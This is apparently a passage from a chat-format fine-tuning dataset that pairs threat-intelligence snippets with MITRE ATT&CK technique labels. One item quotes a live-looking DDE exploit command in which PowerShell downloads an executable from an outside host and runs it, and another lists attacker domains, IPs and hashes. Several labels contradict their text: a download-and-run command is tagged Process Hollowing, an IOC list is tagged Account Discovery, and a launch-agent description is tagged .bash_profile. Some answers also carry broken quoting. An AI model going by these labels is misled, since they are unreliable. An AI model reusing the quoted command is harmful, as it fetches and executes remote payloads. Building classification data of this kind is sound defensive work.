- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Wocao, threat actors used PowerShell on compromised systems."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can retrieve information about the Windows domain."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chimera has used \"tasklist\" to enumerate processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gamaredon Group has used DOCX files to download malicious DOT document templates and has used RTF template injection to download malicious payloads. Gamaredon Group can also inject malicious macros or remote templates into documents already present on compromised systems."
- },
- {
- "role": "assistant",
- "content": "T1221 - Template Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "This function aims to download the powershell code from the command and control server and execute it"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wizard Spider used Base64 encoding to obfuscate an Empire service and PowerShell commands."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MacMa has used macOS API functions to perform tasks."
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TajMahal has the ability to identify connected Apple devices."
- },
- {
- "role": "assistant",
- "content": "T1120 - Peripheral Device Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Calisto runs the \"ifconfig\" command to obtain the IP address from the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "All RDAT samples have malicious verdicts in WildFire and have protections in place through Cortex XDR. DNS tunneling protocols used for C2 communications are blocked via DNS Security. All C2 domains are classified as Command-and-Control for URL Filtering. AutoFocus customers can monitor activity via the rdat_backdoor tag"
- },
- {
- "role": "assistant",
- "content": "T1132.002 - Non-Standard Encoding', 'T1132.001 - Data Encoding: Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has used tools such as the MailFetch mail crawler to collect victim emails (excluding spam) from online services via IMAP."
- },
- {
- "role": "assistant",
- "content": "T1114.002 - Email Collection: Remote Email Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Skidmap has the ability to set SELinux to permissive mode."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Magic Hound has conducted watering-hole attacks through media and magazine websites."
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TURNEDUP is capable of taking screenshots."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After the credit cards are first scanned in real time, the personal account number (PAN) and accompanying data sits in the point-of-sale system’s memory unencrypted while the system determines where to send it for authorization. During that time, the point-of-sale malware opens up the process memory searching for elements related to credit card information"
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Wocao, threat actors used scripts to detect security software."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The SOMBRAT backdoor is packaged as a 64-bit Windows executable. It communicates with a configurable command and control (C2) server via multiple protocols, including DNS, TLS-encrypted TCP, and potentially WebSockets. Although the backdoor supports dozens of commands, most of them enable the operator to manipulate an encrypted storage file and reconfigure the implant. The backdoor's primary purpose is to download and execute plugins provided via the C2 server. In contrast to the SOMBRAT version published in November 2020, Mandiant observed additional obfuscation and armoring to evade detection, this SOMBRAT variant has been hardened to discourage analysis. Program metadata typically included by the compiler has been stripped and strings have been inlined and encoded via XOR-based routines"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "downloader code has included \"0\" characters at the end of the file to inflate the file size in a likely attempt to evade anti-virus detection."
- },
- {
- "role": "assistant",
- "content": "T1027.001 - Obfuscated Files or Information: Binary Padding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat Group-3390 actors use NBTscan to discover vulnerable systems."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Indrik Spider has used batch scripts on victim's machines."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remsec is capable of using SMTP for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.003 - Mail Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Squirrelwaffle has collected the victim’s external IP address."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Despite the simplicity of most of their tools, the Gamaredon group also is capable of deploying some novelty, such as their Outlook VBA module. However, as it is far from stealthy, in the long run it is no match for a capable organization. The variety of tools Gamaredon has at its disposal can be very effective at fingerprinting a machine and understanding what sensitive data is available, then spreading throughout the network"
- },
- {
- "role": "assistant",
- "content": "T1025 - Data from Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "IOCs Domain supservermgr[.]com URL hxxp://supservermgr[.]com/sys/upd/pageupd.php Zebrocy d697160aecf152a81a89a6b5a7d9e1b8b5e121724038c676157ac72f20364edc cba5ab65a24be52214736bc1a5bc984953a9c15d0a3826d5b15e94036e5497df 25f0d1cbcc53d8cfd6d848e12895ce376fbbfaf279be591774b28f70852a4fd8 115fd8c619fa173622c7a1e84efdf6fed08a25d3ca3095404dcbd5ac3deb1f03 f27836430742c9e014e1b080d89c47e43db299c2e00d0c0801a2830b41b57bc1 5b5e80f63c04402d0b282e95e32155b2f86cf604a6837853ab467111d4ac15e2 dd7e69e14c88972ac173132b90b3f4bfb2d1faec15cca256a256dd3a12b6e75d Koadic abbad7acd50754f096fdc6551e728aa6054dcf8e55946f90a02b17db552471ca User Agents Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; InfoPath.1) Mozilla/5.0 (Windows NT 6.1; WOW64) WinHttp/1.6.3.8 (WinHTTP/5.1) like Gecko Mozilla v5.1 (Windows NT 6.1; rv:6.0.1) Gecko/20100101 Firefox/6.0.1 IPs 185.25.51[.]198 185.25.50[.]93 220.158.216[.]127 92.114.92[.]102 86.106.131[.]177 DDE Docs 85da72c7dbf5da543e10f3f806afd4ebf133f27b6af7859aded2c3a6eced2fd5 8cf3bc2bf36342e844e9c8108393562538a9af2a1011c80bb46416c0572c86ff"
- },
- {
- "role": "assistant",
- "content": "T1087 - Account Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the capability to gather the username from the victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "obtains a list of running processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chinese state-sponsored cyber actors used valid accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, RDP, and Virtual Network Computing (VNC). The actor may then perform actions as the logged-on user. Chinese state-sponsored cyber actors also used on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments in order to pivot to cloud resources."
- },
- {
- "role": "assistant",
- "content": "T1210 - Exploitation of Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "High Commissioner of Bangladesh Pakistan eying Sukhoi-35 fighter planes as part of defense deal from Russia 2018.143 PG COURSE IN 2018-2021 BATCH India Bangladesh and Pakistan Press Release on Observance of Historic Mujibnogor Dibosh by Pakistan Mission on 17 April 2018 Afghan Bomb Blast report by ISI USAJOBS Daily Saved Search Results for New GS15 for 3/30/2018 How Rigging take place in Senate Elections in Pakistan Afghan Terrorist group details ISI Restricted113 1971 Liberation War Freedom Fighters in Pakistan Army Custody Database Additionally, the following filenames were witnessed in these attacks (spelling and grammar mistakes included): Liberation Freedom Fighter.xlam NSC details of participants.xlam Raw Sect Vikram report on Pak Army Confidential.doc USA Immagration Policy for Families.ppam doc CV FM.doc doc Sukhoi35 deal report.doc Nominal Roll.doc Press Release 17 April.doc Afghan Blast report by ISI.doc Rigging in Pakistan Senate.doc Afghan Terrorist group report.doc The payloads for these attacks varied in malware family"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WindTail has been incompletely signed with revoked certificates."
- },
- {
- "role": "assistant",
- "content": "T1036.001 - Invalid Code Signature"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We have rounded up 220 samples of the CARBANAK backdoor and compiled a table that highlights some interesting details that we were able to extract. It should be noted that in most of these cases the backdoor was embedded as a packed payload in another executable or in a weaponized document file of some kind. The MD5 hash is for the original executable file that eventually launches CARBANAK, but the details of each sample were extracted from memory during execution. This data provides us with a unique insight into the operational aspect of CARBANAK and can be downloaded here"
- },
- {
- "role": "assistant",
- "content": "T1055.002 - Process Injection: Portable Executable Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Nomadic Octopus used \"cmd.exe /c\" within a malicious macro."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dacls can encrypt its configuration file with AES CBC."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some payloads leveraged DLL side loading, a technique that involves running a legitimate, typically digitally signed, program that loads a malicious DLL. The DLL acts as a stub loader, which loads and executes shell code. BRONZE UNION previously used this technique to enable execution of PlugX and HttpBrowser tools in a way that is challenging for network defenders to detect"
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZxxZ can search the registry of a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 1 Article referenced by decoy document in attack against British government agency The attached document leverages a DDE exploit to ultimately execute the following code:c:\\\\windows\\\\system32\\\\cmd.exe \"/k PowerShell.exe -ExecutionPolicy bypass -windowstyle hidden -noprofile -command (New-Object System.Net.WebClient).DownloadFile('https://881.000webhostapp[.]com/0_31.doc', '%TEMP%\\\\AAA.exe');Start-Process('%TEMP%\\\\AAA.exe')Palo Alto Networks first witnessed this DDE exploit technique in May 2017, and attackers continue to leverage it"
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Frankenstein has used WMI queries to detect if virtualization environments or analysis tools were running on the system."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The ProgramArguments tell us where GrowlHelper is installed and that it takes at least one command line argument (-f). The RunAtLoad key confirms the implant will run every time the user logs in. To get an overview of the installation process, we can monitor file system activity for GrowlHelper events"
- },
- {
- "role": "assistant",
- "content": "T1546.004 - Event Triggered Execution: .bash_profile .bashrc and .shrc"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chimera has used WMIC to execute remote commands."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 enumerated administrative users using the commands \"net localgroup administrators\"."
- },
- {
- "role": "assistant",
- "content": "T1087.001 - Account Discovery: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses FakeTLS to communicate with its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1573 - Encrypted Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Agent Tesla has the ability to extract credentials from configuration or support files."
- },
- {
- "role": "assistant",
- "content": "T1552.001 - Unsecured Credentials: Credentials In Files"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If this function is successfully loaded, it will ultimately spawn a new instance of itself with the Rundll32Call export via a call to rundll32.exe. The Rundll32Call exported function begins by creating a named event named ‘RunOnce’. This event ensures that only a single instance of DDKong is executed at a given time. If this is the only instance of DDKong running at the time, the malware continues. This ensures that only a single instance of DDKong is executed at a given time. DDKong attempts to decode an embedded configuration using a single byte XOR key of 0xC3"
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoetRAT used file system monitoring to track modification and enable automatic exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Activation of these hooks is done by Ebury injecting its dynamic library into every descendant processes of sshd. To inject itself into subprocesses, Ebury hooks execve and use the dynamic linker LD_PRELOAD variable. Every time a new process is created, Ebury adds LD_PRELOAD=<Ebury_filename> to its environment. Once the new process is executed, Ebury’s dynamic library is loaded and its constructor is called, executing the hooking routines"
- },
- {
- "role": "assistant",
- "content": "T1574.006 - Hijack Execution Flow: LD_PRELOAD"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Poseidon utilizes a variety of tools. This tool appears to be designed to operate on high-value corporate systems like Domain Controllers or IIS servers that act as repositories of valuable information, particularly for lateral movement. The Information Gathering Tool (IGT) tool is coded in Delphi and includes powershell and SQL components across a dozen different drops. This tool contains several other executable files made in different programming languages ranging from Visual Basic 6 to C#, each one performing a very clear task devised by the group when trying to obtain more information from an objective"
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Emissary uses HTTP or HTTPS for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sakula has the capability to download files."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "abuses the Windows DLL load order by using a legitimate Symantec anti-virus binary, VPDN_LU.exe, to load a malicious DLL that mimics a legitimate Symantec DLL, navlu.dll."
- },
- {
- "role": "assistant",
- "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Our dynamic analysis showed Lokibot’s behavior, including the benefits and drawbacks of several unpacking methods. Lokibot also used an infected system machine global unique identifier (GUID) value to generate a mutex (an MD5 hash) that acted as a flag to prevent itself from infecting the same machine again. The subject lines of the campaign messages usually started with or included the term “proforma. The malicious attachment was a DOCX, with a file name that also included “proforma” in its pattern. TLP: WHITE https://www.us-cert.gov/tlpCharacteristicsLokibot is an information stealer; the main functionality of its binary is to collect system and application credentials, and user information to send back to the attacker. We conducted dynamic analysis to observe network and system behavior once it infected our Windows OS. It starts from the tenth byte in the data section of the initial TCP POST request. The binary’s hardcoded strings provided data about the binary’s characteristics, behavior, and main functionality.Section HeadersFrom the section headers and distribution of each section, the binary appears to be fairly normal. There are no unusual sections, and the size and distribution of the sections, especially .text, mirrors a standard unpacked binary (Figure 6).File Metadata and StringsThe binary is a PEx86 binary, which can be run on both x86 and 64-bit Windows OS. We determined that the binary was packed because we did not see the C2 URL or any signs of being an information stealer (such as an applications list) in the binary strings and resources"
- },
- {
- "role": "assistant",
- "content": "T1555 - Credentials from Password Stores"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bonadan has discovered the username of the user running the backdoor."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Brave Prince gathers information about the Registry."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group keylogger KiloAlfa obtains user tokens from interactive sessions to execute itself with API call \"CreateProcessAsUserA\" under that user's context."
- },
- {
- "role": "assistant",
- "content": "T1134.002 - Create Process with Token"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MobileOrder has a command to upload to its C2 server information about files on the victim mobile device, including SD card size, installed app list, SMS content, contacts, and calling history."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wevtutil can be used to disable specific event logs on the system."
- },
- {
- "role": "assistant",
- "content": "T1562.002 - Impair Defenses: Disable Windows Event Logging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When the news broke in 2014 about a new sophisticated threat actor dubbed the Turla Group, which the Estonian foreign intelligence service believes has Russian origins and operates on behalf of the FSB, its kernelmode malware also became the first publicly-described case that abused a third-party device driver to disable Driver Signature Enforcement (DSE). This security mechanism was introduced in Windows Vista to prevent unsigned drivers from loading into kernel space. Turla exploited the signed VirtualBox driver, VBoxDrv.sys v1.6.2, to deactivate DSE and load its unsigned payload drivers afterward."
- },
- {
- "role": "assistant",
- "content": "T1211 - Exploitation for Defense Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Earth Lusca has placed a malicious payload in `%WINDIR%\\SYSTEM32\\oci.dll` so it would be sideloaded by the MSDTC service."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The screenshots included remote desktop (RDP) sessions showing the Glimpse panel, a web browser session displaying a C2 panel called Scarecrow, web browser sessions into VPS administrative panels, and evidence of potential destructive attacks against OilRig servers"
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture', 'T1021.001 - Remote Services: Remote Desktop Protocol', 'T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OwaAuth captures and DES-encrypts credentials before writing the username and password to a log file, \"C:\\log.txt\"."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sibot is a dual-purpose malware implemented in VBScript. It is designed to achieve persistence on the infected machine then download and execute a payload from a remote C2 server. The VBScript is then run via a scheduled task"
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "We believe that the injected script came from the Andariel group since the code has similar obfuscation and structure to the sample we previously found from them. The script was used to collect information from visitors’ browser: browser type, system language, Flash Player version, Silverlight version, and multiple ActiveX objects"
- },
- {
- "role": "assistant",
- "content": "T1592.002 - Software"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Also, the postinstall script moves the .CrashReporter program to a new location /Library/JMTTrader/CrashReporter and makes it executable. Because the LaunchDaemon will not run automatically after the plist file is moved, the postinstall script launches CrashReporter with the Maintain parameter and runs it in the background (Create or Modify System Process: Launch Daemon [T1543.004"
- },
- {
- "role": "assistant",
- "content": "T1059.004 - Command and Scripting Interpreter: Bash"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
